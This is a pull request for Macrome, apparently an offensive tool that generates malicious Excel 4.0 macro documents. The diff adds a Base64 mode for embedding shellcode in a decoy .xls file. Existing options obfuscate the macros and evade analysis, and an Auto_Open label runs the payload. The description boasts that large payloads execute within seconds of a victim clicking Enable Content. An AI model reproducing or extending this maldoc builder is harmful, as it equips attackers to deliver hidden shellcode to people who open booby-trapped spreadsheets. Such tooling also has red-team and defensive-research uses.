### PR TITLE
Adding Base64 Payload Mode with Improved Stability

### DIFF
--- a/FormulaHelper.cs
+++ b/FormulaHelper.cs
@@ -34,7 +34,7 @@ namespace Macrome
             {
                 if (b == (byte) 0)
                 {
-                    throw new ArgumentException("Payloads cannot contain null bytes");
+                    throw new ArgumentException("Payloads with null bytes must use the Base64 Payload Method.");
                 }
 
                 curMacroString += (char) b;

--- a/Program.cs
+++ b/Program.cs
@@ -182,13 +182,15 @@ namespace Macrome
         /// <param name="macroSheetName">The name that should be used for the macro sheet. Defaults to Sheet2</param>
         /// <param name="outputFileName">The output filename used for the generated document. Defaults to output.xls</param>
         /// <param name="debugMode">Set this to true to make the program wait for a debugger to attach. Defaults to false</param>
+        /// <param name="payloadMethod">How should shellcode be written in the document. Defaults to using the SheetPackingMethod for encoding.</param>
         /// <param name="password">Password to encrypt document using XOR Obfuscation.</param>
         /// <param name="method">Which method to use for obfuscating macros. Defaults to ObfuscatedCharFunc. </param>
         /// <param name="localizedLabel">Use this flag in order to set a localized label in case Excel is not in US language. Default to Auto_Open</param>
         public static void Build(FileInfo decoyDocument, FileInfo payload, FileInfo payload64Bit, string preamble,
             PayloadType payloadType = PayloadType.Shellcode, 
             string macroSheetName = "Sheet2", string outputFileName = "output.xls", bool debugMode = false,
-            SheetPackingMethod method = SheetPackingMethod.ObfuscatedCharFunc, string password = "", string localizedLabel = "Auto_Open")
+            SheetPackingMethod method = SheetPackingMethod.ObfuscatedCharFunc, PayloadPackingMethod payloadMethod = PayloadPackingMethod.MatchSheetPackingMethod, 
+            string password = "", string localizedLabel = "Auto_Open")
         {
             if (decoyDocument == null || payload == null)
             {
@@ -265,7 +267,15 @@ namespace Macrome
 
             if (binaryPayload != null && binaryPayload.Length > 0)
             {
-                 wbe.SetMacroBinaryContent(binaryPayload, curRw, curCol, dstRwStart, dstColStart + 1, method);
+                 if (payloadMethod == PayloadPackingMethod.Base64)
+                 {
+                     wbe.SetMacroBinaryContent(binaryPayload, 0, dstColStart + 1, 0, 0, method, payloadMethod);
+                 }
+                 else
+                 {
+                     wbe.SetMacroBinaryContent(binaryPayload, curRw, curCol, dstRwStart, dstColStart + 1, method);   
+                 }
+                 
                  curRw = wbe.WbStream.GetFirstEmptyRowInColumn(colStart) + 1;
 
                  if (rwStart > 0xE000)
@@ -276,7 +286,15 @@ namespace Macrome
 
                  if (binary64Payload != null && binary64Payload.Length > 0)
                  {
-                     wbe.SetMacroBinaryContent(binary64Payload, curRw, curCol, dstRwStart, dstColStart + 2, method);
+                     if (payloadMethod == PayloadPackingMethod.Base64)
+                     {
+                         wbe.SetMacroBinaryContent(binary64Payload, 0, dstColStart + 2, 0, 0, method, payloadMethod);
+                     }
+                     else
+                     {
+                         wbe.SetMacroBinaryContent(binary64Payload, curRw, curCol, dstRwStart, dstColStart + 2, method);   
+                     }
+
                      curRw = wbe.WbStream.GetFirstEmptyRowInColumn(colStart) + 1;
 
                      if (rwStart > 0xE000)
@@ -284,10 +302,18 @@ namespace Macrome
                          curRw = 0;
                          curCol += 1;
                      }
-
+                     
                      macros = MacroPatterns.GetMultiPlatformBinaryPattern(preambleCode, macroSheetName);
                  }
+
+                 if (payloadMethod == PayloadPackingMethod.Base64)
+                 {
+                     macros = MacroPatterns.GetBase64DecodePattern(preambleCode);
+                 }
             }
+            
+
+            
             wbe.SetMacroSheetContent(macros, curRw,curCol, dstRwStart, dstColStart, method);
 
             if (method == SheetPackingMethod.CharSubroutine || method == SheetPackingMethod.AntiAnalysisCharSubroutine)

--- a/Program.cs
+++ b/Program.cs
@@ -330,7 +330,7 @@ namespace Macrome
                  wbe.AddLabel(UnicodeHelper.UnicodeArgumentLabel, null, true, true);
                  //Using lblIndex 2, since that what var has set for us
                  wbe.AddFormula(
-                     FormulaHelper.CreateCharInvocationFormulaForLblIndex(charInvocationRw, charInvocationCol, 2));
+                     FormulaHelper.CreateCharInvocationFormulaForLblIndex(charInvocationRw, charInvocationCol, 2), payloadMethod);
             }
 
             wbe.AddLabel(localizedLabel, rwStart, colStart);

--- a/UnitTests/PayloadGenerationTests.cs
+++ b/UnitTests/PayloadGenerationTests.cs
@@ -36,6 +36,7 @@ namespace UnitTests
 
             return shellcode;
         }
+
         private List<string> ConvertPayloadToStrings(byte[] shellcode, BaseNEncoder encoder)
         {
             List<string> output = new List<string>();
@@ -76,7 +77,7 @@ namespace UnitTests
             
             BaseNEncoder encoder = new BaseNEncoder();
 
-            var strings = ConvertPayloadToStrings(shellcode, encoder);
+            var strings = FormulaHelper.BuildBase64PayloadMacros(shellcode);
             foreach(var s in strings) {Console.WriteLine(string.Format("=\"{0}\"",s));}
             
             string encodedShellcode = encoder.Encode(shellcode);
@@ -121,7 +122,8 @@ namespace UnitTests
             
             byte[] shellcode = TestHelpers.GetPopCalc64Shellcode();
             shellcode = XorPayloadAgainstString(shellcode, xorKey);
-            var strings = ConvertPayloadToStrings(shellcode, encoder);
+            // var strings = ConvertPayloadToStrings(shellcode, encoder);
+            var strings = FormulaHelper.BuildBase64PayloadMacros(shellcode);
             foreach(var s in strings) {Console.WriteLine(string.Format("=\"{0}\"",s));}
         }
     }

--- a/WorkbookEditor.cs
+++ b/WorkbookEditor.cs
@@ -138,21 +138,37 @@ namespace Macrome
             int dstColStart, SheetPackingMethod packingMethod = SheetPackingMethod.ObfuscatedCharFunc,
             PayloadPackingMethod payloadPackingMethod = PayloadPackingMethod.MatchSheetPackingMethod)
         {
-            List<string> payloadMacros = FormulaHelper.BuildPayloadMacros(payload);
+            List<string> payloadMacros;
             List<BiffRecord> formulasToAdd = new List<BiffRecord>();
-            formulasToAdd.AddRange(FormulaHelper.ConvertStringsToRecords(payloadMacros, rwStart, colStart, dstRwStart, dstColStart, 15, packingMethod));
-            
-            if (payloadPackingMethod == PayloadPackingMethod.Base64)
+
+            if (payloadPackingMethod == PayloadPackingMethod.MatchSheetPackingMethod)
+            {
+                payloadMacros = FormulaHelper.BuildPayloadMacros(payload);
+                formulasToAdd.AddRange(FormulaHelper.ConvertStringsToRecords(payloadMacros, rwStart, colStart,
+                    dstRwStart, dstColStart, 15, packingMethod));
+            }
+            else if (payloadPackingMethod == PayloadPackingMethod.Base64)
             {
                 payloadMacros = FormulaHelper.BuildBase64PayloadMacros(payload);
                 formulasToAdd = FormulaHelper.ConvertBase64StringsToRecords(payloadMacros, rwStart, colStart);
             }
-            
 
             WorkbookStream macroStream = GetMacroStream();
             try
             {
                 BiffRecord lastFormulaInSheet = macroStream.GetAllRecordsByType<Formula>().Last();
+                // If we are using base64 packing, we write STRING entries after our formulas, so check for that first
+                if (payloadPackingMethod == PayloadPackingMethod.Base64)
+                {
+                    try
+                    {
+                        lastFormulaInSheet = macroStream.GetAllRecordsByType<STRING>().Last();
+                    }
+                    catch
+                    {
+                        lastFormulaInSheet = macroStream.GetAllRecordsByType<Formula>().Last();
+                    }
+                }
                 WorkbookStream modifiedStream = WbStream.InsertRecords(formulasToAdd, lastFormulaInSheet);
                 WbStream = modifiedStream;
                 return modifiedStream;
@@ -164,15 +180,30 @@ namespace Macrome
             }
         }
 
-        public WorkbookStream AddFormula(Formula formula)
+        public WorkbookStream AddFormula(Formula formula, PayloadPackingMethod payloadPackingMethod = PayloadPackingMethod.MatchSheetPackingMethod)
         {
-            Formula lastFormula = WbStream.GetAllRecordsByType<Formula>().Last();
+            BiffRecord lastFormula = WbStream.GetAllRecordsByType<Formula>().Last();
+            
+            // If we are using base64 packing, we write STRING entries after our formulas, so check for that first
+            if (payloadPackingMethod == PayloadPackingMethod.Base64)
+            {
+                try
+                {
+                    lastFormula = WbStream.GetAllRecordsByType<STRING>().Last();
+                }
+                catch
+                {
+                    lastFormula = WbStream.GetAllRecordsByType<Formula>().Last();
+                }
+            }
+            
             WbStream = WbStream.InsertRecord(formula, lastFormula);
             WbStream = WbStream.FixBoundSheetOffsets();
             return WbStream;
         }
 
-        public WorkbookStream SetMacroSheetContent(List<string> macroStrings, int rwStart = 0, int colStart = 0, int dstRwStart = 0, int dstColStart = 0, SheetPackingMethod packingMethod = SheetPackingMethod.ObfuscatedCharFunc)
+        public WorkbookStream SetMacroSheetContent(List<string> macroStrings, int rwStart = 0, int colStart = 0, 
+            int dstRwStart = 0, int dstColStart = 0, SheetPackingMethod packingMethod = SheetPackingMethod.ObfuscatedCharFunc)
         {
             WorkbookStream macroStream = GetMacroStream();
 
@@ -184,7 +215,7 @@ namespace Macrome
 
             int lastGotoCol = formulasToAdd.Last().AsRecordType<Formula>().col;
             int lastGotoRow = formulasToAdd.Last().AsRecordType<Formula>().rw + 1;
-
+            
             Formula gotoFormula = FormulaHelper.GetGotoFormulaForCell(lastGotoRow, lastGotoCol, dstRwStart, dstColStart);
             WorkbookStream modifiedStream = WbStream.ReplaceRecord(replaceMeFormula, gotoFormula);
             modifiedStream = modifiedStream.InsertRecords(formulasToAdd, gotoFormula);

--- a/WorkbookEditor.cs
+++ b/WorkbookEditor.cs
@@ -18,7 +18,13 @@ namespace Macrome
         ObfuscatedCharFunc,
         ObfuscatedCharFuncAlt,
         CharSubroutine,
-        AntiAnalysisCharSubroutine
+        AntiAnalysisCharSubroutine,
+    }
+
+    public enum PayloadPackingMethod
+    {
+        MatchSheetPackingMethod,
+        Base64
     }
 
     public class WorkbookEditor
@@ -129,11 +135,19 @@ namespace Macrome
         }
 
         public WorkbookStream SetMacroBinaryContent(byte[] payload, int rwStart, int colStart, int dstRwStart,
-            int dstColStart, SheetPackingMethod packingMethod = SheetPackingMethod.ObfuscatedCharFunc)
+            int dstColStart, SheetPackingMethod packingMethod = SheetPackingMethod.ObfuscatedCharFunc,
+            PayloadPackingMethod payloadPackingMethod = PayloadPackingMethod.MatchSheetPackingMethod)
         {
             List<string> payloadMacros = FormulaHelper.BuildPayloadMacros(payload);
             List<BiffRecord> formulasToAdd = new List<BiffRecord>();
             formulasToAdd.AddRange(FormulaHelper.ConvertStringsToRecords(payloadMacros, rwStart, colStart, dstRwStart, dstColStart, 15, packingMethod));
+            
+            if (payloadPackingMethod == PayloadPackingMethod.Base64)
+            {
+                payloadMacros = FormulaHelper.BuildBase64PayloadMacros(payload);
+                formulasToAdd = FormulaHelper.ConvertBase64StringsToRecords(payloadMacros, rwStart, colStart);
+            }
+            
 
             WorkbookStream macroStream = GetMacroStream();
             try


### PR DESCRIPTION
Added the `payload-method` argument to building which allows separate encoding for binary payloads versus the macro to load them. This makes it MUCH easier to define payloads (no need to make sure there are no null bytes) and the loading process is significantly faster. During testing I've seen entire shell-codified 5MB Go payloads load and execute within 2 seconds of pressing the Enable Content button. If you're using smaller payloads this should feel pretty quick. 